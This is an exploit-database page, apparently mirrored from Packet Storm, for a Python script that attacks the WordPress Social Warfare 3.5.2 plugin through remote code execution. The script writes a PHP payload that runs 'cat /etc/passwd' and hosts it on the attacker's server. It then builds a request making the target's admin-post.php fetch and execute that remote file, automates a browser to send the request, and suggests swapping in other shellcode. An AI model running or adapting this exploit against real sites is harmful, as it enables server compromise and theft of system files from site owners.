WordPress Social Warfare 3.5.2 Remote Code Execution

🗓️ 27 Jul 2021 00:00:00Reported by Raed AhsanType

packetstorm🔗 packetstormsecurity.com👁 403 Views

WordPress Social Warfare 3.5.2 Remote Code Execution by Raed Ahsan on 24/07/202

Reporter	Title	Published	Views	Family All 39
0day.today	Wordpress Social Warfare Plugin 3.5.3 - Remote Code Execution Exploit	3 May 201900:00	–	zdt
0day.today	WordPress Social Warfare 3.5.2 Remote Code Execution Exploit	27 Jul 202100:00	–	zdt
GithubExploit	Vuln_Exploitation_MegaQuagga_Pentest	30 Apr 202600:52	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	3 May 201905:57	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	25 Mar 201923:38	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	1 Jan 202608:02	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	27 Mar 202523:18	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	25 Jan 202619:32	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	20 Jan 202316:29	–	githubexploit
ATTACKERKB	CVE-2019-9978	24 Mar 201900:00	–	attackerkb

`# Author = Raed Ahsan  
# Creation Date = 24/07/2021  
# Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution  
# Linkedin = https://linkedin.com/in/raed-ahsan/  
  
  
import socket  
import requests  
import subprocess  
import time  
import pyautogui  
  
print("[*]Start your python SimpleHTTPServer on port 1234 please...")  
time.sleep(5)  
# Creating the payload for wordpress url  
with open("shell.txt", "w") as file:  
file.write("<pre>system('cat /etc/passwd')</pre>")  
  
print("[*]Payload has been created")  
  
with open("url.txt", "w") as url:  
url.write("http://{MACHINE_IP}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{YOUR_IP}:{YOUR_PYTHON_SERVER_PORT}/shell.txt")  
print("[*]Use the URL in the url.txt")  
print("[*]Make sure to edit the ip and port in the url.txt according to your needs")  
"""  
EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS  
"""  
print("[*]Moving the shell.txt to /var/www/html")  
time.sleep(3)  
username = input("What's your username in your machine: ")  
subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True)  
print("[*]File copied to /var/www/html")  
time.sleep(2)  
print("[*]Opening Apache2 service...")  
print("[*]Make sure you have apache2 installed")  
subprocess.call(["sudo service apache2 start"], shell=True)  
print("[*]Service started")  
  
machine_ip = input("Target Machine IP: ")  
  
print("[*]Open your python listener at port 1234")  
  
time.sleep(2)  
print("[*]Opening Browser")  
  
pyautogui.hotkey('winleft')  
pyautogui.typewrite('chrome\n', 0.5)  
pyautogui.typewrite(f'http://{machine_ip}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.200:1234/shell.txt\n', 0.2)  
  
print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.")  
  
print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")  
`

27 Jul 2021 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.88711